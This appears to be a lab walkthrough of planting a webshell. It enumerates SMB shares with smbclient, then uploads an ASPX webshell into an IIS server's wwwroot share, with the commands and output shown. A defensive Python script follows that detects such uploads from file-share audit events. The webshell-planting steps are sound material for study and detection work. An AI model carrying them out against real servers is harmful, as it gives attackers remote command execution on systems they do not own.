Enumerating victim host 10.0.0.6 for any shares:

```
# attacker@local
smbclient -L //10.0.0.6 -U spot

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	CertEnroll      Disk      Active Directory Certificate Services share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
	temp            Disk
	tools           Disk
	transcripts     Disk
	wwwroot         Disk
```
Logging in to the wwwroot share:

```
# attacker@local
smbclient //10.0.0.6/wwwroot -U spot

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug 25 16:57:52 2018
  ..                                  D        0  Sat Aug 25 16:57:52 2018
  aspnet_client                       D        0  Tue Jul 31 20:11:20 2018
  iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018
  iisstart.htm                        A        3  Tue Jul 31 19:38:23 2018
```
Uploading a webshell into the wwwroot:

```
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx

putting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)
smb: \> ls
  .                                   D        0  Sat Aug 25 16:59:47 2018
  ..                                  D        0  Sat Aug 25 16:59:47 2018
  aspnet_client                       D        0  Tue Jul 31 20:11:20 2018
  c.aspx                              A     1400  Sat Aug 25 16:59:47 2018
  iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018
  iisstart.htm                        A        3  Tue Jul 31 19:38:23 2018

		6463487 blocks of size 4096. 3032260 blocks available
```
Attacker can now access the newly uploaded webshell via http://10.0.0.6/c.aspx and start executing commands.
See T1108: Webshells for observations.
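
From the defender's side, the upload shown above is visible in file share auditing. The following is an added example, not part of the original page: it flags writes of server-side script files to a share backed by a web root, assuming Windows Security event 5145 records (which require detailed file share auditing to be enabled) exported as dicts with their standard field names. The sample events, the source IP and the `WEBROOT_SHARES` list are constructed for illustration.

```python
import ntpath

# Extensions a web server may hand to a script engine; tune to the handlers mapped on yours.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".cshtml", ".php", ".jsp"}
# Assumption: shares known to map onto a web root (the page's wwwroot share).
WEBROOT_SHARES = {"wwwroot"}
FILE_WRITE_DATA, FILE_APPEND_DATA = 0x2, 0x4  # file access-mask bits

def share_leaf(share_name):
    # Event 5145 records the share as \\*\name; keep only the name.
    return share_name.rstrip("\\").rsplit("\\", 1)[-1].lower()

def effective_ext(relative_name):
    # Win32 path handling drops trailing dots/spaces and treats ":stream" as a
    # stream suffix, so normalise before looking at the extension.
    leaf = ntpath.basename(relative_name).split(":", 1)[0].rstrip(". ")
    return ntpath.splitext(leaf)[1].lower()

def is_webroot_script_write(ev):
    if ev.get("EventID") != 5145:
        return False
    if share_leaf(ev.get("ShareName", "")) not in WEBROOT_SHARES:
        return False
    mask = int(ev.get("AccessMask", "0x0"), 16)
    if not mask & (FILE_WRITE_DATA | FILE_APPEND_DATA):
        return False
    return effective_ext(ev.get("RelativeTargetName", "")) in SCRIPT_EXTS

def find_alerts(events):
    return [(e["SubjectUserName"], e["IpAddress"], e["RelativeTargetName"])
            for e in events if is_webroot_script_write(e)]

def sample(share, name, mask, event_id=5145):
    # Builds a constructed record; user and source IP are sample values.
    return {"EventID": event_id, "SubjectUserName": "spot", "IpAddress": "10.0.0.5",
            "ShareName": share, "RelativeTargetName": name, "AccessMask": mask}

# Constructed sample events (not captured from the host in the walkthrough).
SAMPLE_EVENTS = [
    sample(r"\\*\wwwroot", "iisstart.htm", "0x1"),            # read only
    sample(r"\\*\wwwroot", "c.aspx", "0x2"),                  # script written
    sample(r"\\*\wwwroot", "iis-85.png", "0x2"),              # non-script write
    sample(r"\\*\wwwroot", "aspnet_client\\t.ASPX.", "0x6"),  # trailing-dot variant
    sample(r"\\*\temp", "c.aspx", "0x2"),                     # not a web-root share
]

if __name__ == "__main__":
    for user, ip, name in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT script written to web root over SMB: {name} by {user} from {ip}")
```

The same condition can be expressed as a SIEM rule on event 5145; the stronger fix is to avoid exposing the web root as a writable share at all.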